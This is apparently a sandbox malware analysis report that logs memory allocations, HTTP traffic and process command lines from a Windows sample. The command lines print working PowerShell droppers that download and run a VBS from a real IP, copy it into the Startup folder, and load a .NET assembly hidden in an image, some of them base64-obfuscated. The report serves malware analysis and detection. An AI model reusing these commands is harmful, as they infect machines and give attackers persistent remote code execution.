Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 9, 2023, 9:41 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

Connection to IP address

suspicious_request

GET http://141.98.6.202/windows/wind/IE_Cache.vbs

Performs some HTTP requests (2 events)

request	GET http://141.98.6.202/windows/wind/IE_Cache.vbs
request	GET http://apps.identrust.com/roots/dstrootcax3.p7c

Allocates read-write-execute memory (usually to unpack itself) (50 out of 678 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 2293760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02bc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0275a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02752000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02762000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02bc1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02bc2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0278a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02763000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02764000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0279b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02797000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0275b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02782000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02795000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02765000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0278c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05030000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02766000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0279c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02783000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02784000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02785000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02786000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02787000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02788000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02789000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050ed000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050ee000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050ef000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2023, 9:41 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Windows\Temp\Debug.vbs

Creates a shortcut to an executable file (2 events)

file	C:\Users\test22\AppData\Local\Temp\IGCCU.lnk
file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (9 events)

cmdline	"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Windows\Temp\Debug.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ reUAofclWUÇ.vbs')"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA1ADkANwAvADIAMwA2AC8AbwByAGkAZwBpAG4AYQBsAC8AcgB1AG0AcABfAHAAcgBpAHYAYQBkAGEALgBqAHAAZwA/ADEANgA5ADMAOAA0ADcAMAA3ADAAJwA7ACQAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIAAkAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGkAbQBhAGcAZQBVAHIAbAApADsAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGUAbgBkAEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACkAOwAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJAB0AHkAcABlACAAPQAgACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACcARgBpAGIAZQByAC4ASABvAG0AZQAnACkAOwAkAG0AZQB0AGgAbwBkACAAPQAgACQAdAB5AHAAZQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkAOwAkAGEAcgBnAHUAbQBlAG4AdABzACAAPQAgACwAKAAnAHQAeAB0AC4AZABhAHAAZABlAHQAbwBOAC8AcwB3AG8AZABuAGkAdwAvADIAMAAyAC4ANgAuADgAOQAuADEANAAxAC8ALwA6AHAAdAB0AGgAJwApADsAJABtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAGEAcgBnAHUAbQBlAG4AdABzACkA'";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64String( $codigo))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden curl http://141.98.6.202/windows/wind/IE_Cache.vbs -o C:\Windows\Temp\Debug.vbs
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/597/236/original/rump_privada.jpg?1693847070';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.dapdetoN/swodniw/202.6.89.141//:ptth');$method.Invoke($null, $arguments)"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden curl http://141.98.6.202/windows/wind/IE_Cache.vbs -o C:\Windows\Temp\Debug.vbs ;Start-Process C:\Windows\Temp\Debug.vbs
cmdline	cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Windows\Temp\Debug.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ reUAofclWUÇ.vbs')"
cmdline	cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Windows\Temp\Debug.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ reUAofclWUÇ.vbs')"
cmdline	powershell -command "$Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA1ADkANwAvADIAMwA2AC8AbwByAGkAZwBpAG4AYQBsAC8AcgB1AG0AcABfAHAAcgBpAHYAYQBkAGEALgBqAHAAZwA/ADEANgA5ADMAOAA0ADcAMAA3ADAAJwA7ACQAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIAAkAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGkAbQBhAGcAZQBVAHIAbAApADsAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGUAbgBkAEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACkAOwAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJAB0AHkAcABlACAAPQAgACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACcARgBpAGIAZQByAC4ASABvAG0AZQAnACkAOwAkAG0AZQB0AGgAbwBkACAAPQAgACQAdAB5AHAAZQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkAOwAkAGEAcgBnAHUAbQBlAG4AdABzACAAPQAgACwAKAAnAHQAeAB0AC4AZABhAHAAZABlAHQAbwBOAC8AcwB3AG8AZABuAGkAdwAvADIAMAAyAC4ANgAuADgAOQAuADEANAAxAC8ALwA6AHAAdAB0AGgAJwApADsAJABtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAGEAcgBnAHUAbQBlAG4AdABzACkA'";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64String( $codigo))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""
cmdline	powershell -command [System.IO.File]::Copy('C:\Windows\Temp\Debug.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ reUAofclWUÇ.vbs')

A process created a hidden window (6 events)

Time & API	Arguments	Status	Return
